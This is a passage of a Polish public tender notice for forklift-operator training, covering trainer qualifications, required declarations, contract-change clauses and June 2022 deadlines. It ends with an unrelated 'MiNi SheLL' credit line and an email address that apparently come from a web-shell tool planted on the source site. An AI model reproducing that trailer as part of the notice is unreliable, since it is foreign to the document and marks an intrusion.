rezerwowa), podobnego pod względem zawartości merytorycznej, zgodnej z<br/>przedmiotem zamówienia, minimum jednego szkolenia w zakresie tematyki zajęć, które będzie prowadziła dana osoba przy<br/>realizacji przedmiotu zamówienia zgodnie z planem nauczania<br/>lub<br/>- wykonywanie zawodu nauczyciela, w okresie ostatnich trzech lat przed upływem terminu składania ofert, przedmiotów o<br/>tematyce podobnej pod względem zawartości merytorycznej, zgodnej<br/>z przedmiotem zamówienia, w zakresie tematyki zajęć, które będzie prowadziła dana osoba przy realizacji przedmiotu<br/>zamówienia zgodnie z planem nauczania.<br/>Za posiadane wykształcenie niezbędne do wykonania zamówienia Zamawiający uzna:<br/>- posiadanie przez kadrę dydaktyczną realizującą zajęcia edukacyjne (kadra podstawowa i rezerwowa) wykształcenia lub<br/>kwalifikacji zawodowych (ukończone kursy) w kierunku pokrewnym związanym z tematyką szkolenia.<br/>W przypadku osób, które będą prowadziły zajęcia praktyczne z obsługi wózków jezdniowych:<br/>1) Zamawiający nie stawia warunku dotyczącego poziomu wykształcenia,<br/>2) Wskazane osoby muszą posiadać doświadczenie polegające na przeprowadzeniu,<br/>w okresie ostatnich trzech lat przed upływem terminu składania ofert, co najmniej jednego szkolenia z zakresu operatora<br/>wózków jezdniowych.<br/>Ostateczna liczba osób wykonujących zamówienie musi być taka, aby zapewnić jego należytą i terminową realizację<br/>przedmiotu zamówienia.<br/>c) Zamawiający wymaga, aby Wykonawca dysponował do realizacji zajęć edukacyjnych w zakresie zajęć praktycznych co<br/>najmniej 2 (dwoma) wózkami jezdniowymi, w tym co najmniej jednym wózkiem podnośnikowym, posiadającymi aktualne<br/>zezwolenie wydane przez UDT. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku<br/>podstaw do wykluczenia z udziału w postępowaniu:<br/>a) oświadczenia wykonawcy, w zakresie art. 108 ust.1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007r. o ochronie konkurencji<br/>i konsumentów (Dz. U. z 2021r. poz. 275) z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do<br/>tej samej grupy kapitałowej wraz z dokumentami lub informacjami, potwierdzającymi przygotowanie oferty niezależnie od innego<br/>wykonawcy należącego do tej samej grupy kapitałowej – zgodnie z załącznikiem nr 9 do niniejszej SWZ;<br/>b) oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa<br/>w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego – zgodnie z<br/>załącznikiem Nr 10 do niniejszej SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu<br/>potwierdzenia spełniania warunków udziału w postępowaniu:<br/>a) dotyczących wymaganych uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej:<br/>Oświadczenia Wykonawcy o posiadaniu wpisu do rejestru instytucji szkoleniowych – według załącznika nr 5 do niniejszej SWZ;<br/>b) dotyczących zdolności technicznej lub zawodowej:<br/>wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3<br/>lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich<br/>wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane,<br/>oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o<br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w<br/>przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest<br/>w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal<br/>wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie<br/>ostatnich 3 miesięcy liczonych od dnia w którym upływa termin składania ofert – zgodnie<br/>z załącznikiem Nr 6 do niniejszej SWZ;<br/>W wykazie usług należy wskazać tylko te usługi, które potwierdzają spełnianie warunku udziału w postępowaniu, o którym mowa w<br/>Rozdziale 6 pkt 6.1.4 SWZ<br/>c) dotyczących zdolności technicznej lub zawodowej:<br/>wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz<br/>informacją o podstawie do dysponowania tymi osobami – zgodnie z załącznikiem Nr 7 do niniejszej SWZ;<br/>d) dotyczących zdolności technicznej lub zawodowej:<br/>wykazu narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia<br/>publicznego wraz z informacją o podstawie do dysponowania tymi zasobami według wzoru stanowiącego załącznik nr 8 do niniejszej SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby,<br/>składa wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do<br/>dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia – (w formie<br/>elektronicznej,<br/>w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym) - zgodnie<br/>z załącznikiem nr 11 do niniejszej SWZ lub inny podmiotowy środek dowodowy potwierdzający,<br/>że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych<br/>podmiotów.<br/>Dla swej skuteczności zobowiązanie musi zostać złożone przez osobę/osoby uprawnione do reprezentowania podmiotu<br/>trzeciego w powyższym zakresie. Zobowiązanie złożone przez osobę<br/>nieuprawnioną nie dowodzi udostępnienia zasobu przez podmiot trzeci.<br/>2. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów<br/>udostępniających zasoby, przedstawia, wraz z oświadczeniami, o którym mowa w pkt 8.1 SWZ<br/>także oświadczenia podmiotu udostępniającego zasoby, potwierdzające brak podstaw<br/>wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w<br/>zakresie, w jakim wykonawca powołuje się na jego zasoby – zgodnie z załącznikiem Nr 2 i 3 do<br/>niniejszej SWZ.<br/>3. Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów na zasadach<br/>określonych w art. 118 ustawy, przedstawia na wezwanie zamawiającego dokumenty<br/>wymienione w pkt. 8.3.2 SWZ dotyczące tych podmiotów, potwierdzające, że nie zachodzą wobec tych<br/>podmiotów podstawy wykluczenia z postępowania.<br/>4. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a) oświadczenia o których mowa w pkt. 8.1 SWZ składa z ofertą każdy<br/>z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia<br/>te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału<br/>w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków<br/>udziału w postępowaniu.<br/>b) w przypadku, o którym mowa w rozdziale 6.3 SWZ wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi<br/>wykonają poszczególni wykonawcy. Oświadczenie należy złożyć wg wymogów załącznika Nr 4<br/>do SWZ. Oświadczenie to jest podmiotowym środkiem dowodowym.<br/>c) zobowiązani są oni na wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe, o<br/>których mowa w pkt. 8.3 SWZ, przy czym podmiotowe środki dowodowe, o których mowa:<br/> w pkt. 8.3.1 SWZ składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/-ą<br/>spełnienie warunku<br/> w pkt. 8.3.2 SWZ składa każdy z Wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia. Jeżeli została wybrana oferta wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia, zamawiający może żądać przed zawarciem umowy w sprawie<br/>zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców.<br/>5. Potwierdzenie umocowania do działania w imieniu wykonawcy lub podmiotu udostępniającego<br/>zasoby:<br/>a) zamawiający w celu potwierdzenia, że osoba działająca w imieniu wykonawcy lub podmiotu<br/>udostępniającego zasoby jest umocowana do jego reprezentowania, żąda złożenia wraz z ofertą<br/>odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej lub innego właściwego rejestru;<br/>b) wykonawca lub podmiot udostępniający zasoby nie jest zobowiązany do złożenia<br/>dokumentów, o których mowa w lit a), jeżeli zamawiający może je uzyskać za pomocą<br/>bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskazał dane umożliwiające<br/>dostęp do tych dokumentów.<br/>Ciąg dalszy w sekcji IX - Pozostałe informacje <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a) oświadczenia o których mowa w pkt. 8.1 SWZ składa z ofertą każdy<br/>z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia<br/>te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału<br/>w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków<br/>udziału w postępowaniu.<br/>b) w przypadku, o którym mowa w rozdziale 6.3 SWZ wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi<br/>wykonają poszczególni wykonawcy. Oświadczenie należy złożyć wg wymogów załącznika Nr 4<br/>do SWZ. Oświadczenie to jest podmiotowym środkiem dowodowym.<br/>c) zobowiązani są oni na wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe, o<br/>których mowa w pkt. 8.3 SWZ, przy czym podmiotowe środki dowodowe, o których mowa:<br/> w pkt. 8.3.1 SWZ składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/-ą<br/>spełnienie warunku<br/> w pkt. 8.3.2 SWZ składa każdy z Wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia.<br/>3. Jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, zamawiający może żądać przed zawarciem umowy w sprawie zamówienia<br/>publicznego kopii umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwości wprowadzenia zmian do zawartej umowy, na podstawie art.<br/>454-455 ustawy oraz Projektu umowy, w zakresie: 1. a) elementów programu szkolenia<br/>stanowiącego załącznik nr 1 do niniejszej umowy,<br/>b) miejsca szkolenia,<br/>c) terminu rozpoczęcia i zakończenia szkolenia, o których mowa w § 2 ust. 2<br/>d) zmniejszenia należności za szkolenie w przypadku zmiany liczby uczestników szkolenia<br/>niezależnej od Zamawiającego,<br/>e) zmiany osób prowadzących szkolenie, nie wskazanych w złożonej w ramach postępowania<br/>o udzielenie zamówienia publicznego ofercie.<br/>2. Zmiana, o której mowa w ust. 1 lit. a może nastąpić w przypadku:<br/>a) konieczności dostosowania programu do zmienionych wytycznych do których stosowania<br/>zobowiązany jest przez Instytucję Pośredniczącą Zamawiający.<br/>b) zmiany przepisów prawa mogących mieć wpływ na program szkolenia.<br/>3. W przypadku wystąpienia okoliczności, o których mowa w ust. 2, Wykonawca lub<br/>Zamawiający jest zobowiązany niezwłocznie złożyć drugiej stronie umowy, w formie pisemnej, uzasadnienie okoliczności<br/>będących przyczyną zmian, o których mowa w ust. 2. Zamawiający<br/>dokona oceny przesłanek wskazanych przez Wykonawcę do zmiany umowy. Dokonana zmiana<br/>programu szkolenia nie może negatywnie wpływać na jakość i kompletność tematyki szkolenia<br/>będącego przedmiotem zamówienia.<br/>4. Zmiana, o której mowa w ust. 1 lit. b i c może nastąpić w przypadku zdarzeń losowych, np.<br/>zalanie, powódź, pożar, uniemożliwiających realizację zajęć w miejscu lub terminie określonym w § 2<br/>umowy.<br/>W przypadku wystąpienia okoliczności, o których mowa powyżej, Wykonawca jest zobowiązany<br/>niezwłocznie złożyć, w formie pisemnej, uzasadnienie okoliczności będących przyczyną zmian.<br/>Zamawiający dokona oceny przesłanek wskazanych przez Wykonawcę do zmiany umowy.<br/>Dokonana zmiana nie może negatywnie wpływać na jakość szkolenia będącego przedmiotem<br/>zamówienia.<br/>5. Zmiana osób prowadzących szkolenie na podstawie ust.1 lit. e może nastąpić:<br/>a) w razie śmierci, choroby, lub innych zdarzeń losowych uniemożliwiających osobom<br/>wskazanych w kadrze do prowadzenia zajęć,<br/>b) niewywiązywania się osób prowadzących zajęcia z należytego wykonywania przedmiotu<br/>zamówienia;<br/>c) wystąpienia innych niezależnych od wykonawcy (np. rezygnacji) okoliczności skutkujących<br/>koniecznością zmiany osób przewidywanych do realizacji zamówienia.<br/>6. W przypadkach, o których mowa w ust. 5 Wykonawca zobowiązany jest do przedstawienia<br/>Zamawiającemu w formie pisemnej, powodów uniemożliwiających wykonanie usługi szkolenia<br/>przez osoby wskazane do realizacji zamówienia w kadrze podstawowej i rezerwowej, oraz<br/>wskazania nowych osób wraz z informacjami na temat ich kwalifikacji i doświadczenia zgodnie<br/>z wymaganiami Zamawiającego określonymi w SWZ, z zastrzeżeniem ust. 8.<br/>7. W przypadku o którym mowa w ust. 5 lit. b Zamawiający zawiadomi Wykonawcę na piśmie<br/>o powodach, dla których żąda zmiany osób realizujących zamówienie oraz wyznaczy termin,<br/>w jakim Wykonawca zobowiązany będzie wskazać nowe osoby spełniające wymogi<br/>Zamawiającego, z zastrzeżeniem ust. 8.<br/>8. Kwalifikacje i doświadczenie nowych osób wyznaczonych przez Wykonawcę do realizacji<br/>umowy, muszą spełniać warunki określone w SWZ oraz przyjęte do oceny w ramach kryteriów<br/>oceny ofert. Warunkiem dopuszczenia nowych osób realizujących zadania w ramach umowy jest<br/>akceptacja Zamawiającego oraz spełnianie przez te osoby kryteriów przyjętych do oceny ofert w<br/>taki sposób, iż zmiana osoby w kadrze nie będzie skutkowała obniżeniem liczby punków, które<br/>uzyskał Wykonawca w ramach oceny ofert w prowadzonym postępowaniu o udzielenie<br/>zamówienia publicznego.<br/>Ciąg dalszy w sekcji IX: Pozostałe informacje <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-22 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu, zgodnie z Instrukcją użytkownika. W formularzu oferty Wykonawca zobowiązany jest podać adres skrzynki ePUAP, na którym prowadzona będzie korespondencja związana z postępowaniem.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-22 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-07-21</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> I. Ciąg dalszy treści Sekcja V: Wykaz innych wymaganych oświadczeń lub dokumentów:<br/>c) jeżeli w imieniu wykonawcy lub podmiotu udostępniającego zasoby działa osoba, której<br/>umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w lit a),<br/>zamawiający żąda od wykonawcy lub podmiotu udostępniającego zasoby złożenia wraz z ofertą<br/>pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania<br/>wykonawcy lub podmiotu udostępniającego zasoby.<br/>6. Pełnomocnictwo do reprezentowania wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia w postępowaniu o udzielenie zamówienia albo do reprezentowania ich w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (jeżeli dotyczy).<br/>Formularz ofertowy – do wykorzystania wzór (druk), stanowiący Załącznik nr 12 do SWZ (przy<br/>czym Wykonawca może sporządzić ofertę wg innego wzorca, powinna ona wówczas obejmować<br/>dane wymagane dla oferty w SWZ i załącznikach).<br/>II. Ciąg dalszy Sekcja VII Projektowane postanowienia umowy:<br/>9. Zamiana osób pomiędzy kadrą podstawową a rezerwową wskazaną przez Wykonawcę<br/>w ofercie może nastąpić po pisemnym zawiadomieniu przez Wykonawcę zawierającym<br/>wskazanie przyczyny konieczności zmiany oraz uzyskaniu zgody Zamawiającego.<br/>10. Zmiany w harmonogramie nie naruszające warunków niniejszej umowy mogą nastąpić po<br/>pisemnymi zawiadomieniu Wykonawcy zawierającym wskazanie przyczyny konieczności zmiany<br/>oraz uzyskaniu zgody Zamawiającego.<br/>11. Dodatkowo Zamawiający przewiduje, iż strony mogą dokonać zmiany postanowień niniejszej<br/>umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, za<br/>zgodą obu stron w formie pisemnego aneksu pod rygorem nieważności, w przypadku:<br/>1) gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym<br/>wpływ na realizację przedmiotu umowy.<br/>2) konieczności wprowadzenia zmian będących następstwem zmian wytycznych lub zaleceń<br/>Instytucji, która przyznała środki na sfinansowanie umowy.<br/>3) Konieczności zmiany terminu realizacji przedmiotu umowy z przyczyn niezawinionych przez<br/>strony, zaistnienia siły wyższej (powódź, pożar, zamieszki, strajki, ataki terrorystyczne, przerwy w dostawie energii<br/>elektrycznej), a także wystąpienie okoliczności związanych z COVID-19 mające wpływ na realizację umowy z<br/>zastrzeżeniem, iż nie może spowodować to zmiany ceny wynikającej z oferty, na podstawie której był dokonany wybór<br/>Wykonawcy.<br/>III. Zamawiający wyklucza Wykonawców na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych<br/>rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa<br/>narodowego (Dz.U. z 2022r. poz. 835), z postępowania o udzielenie zamówienia publicznego prowadzonego na podstawie<br/>ustawy.

Creat By MiNi SheLL
Email: jattceo@gmail.com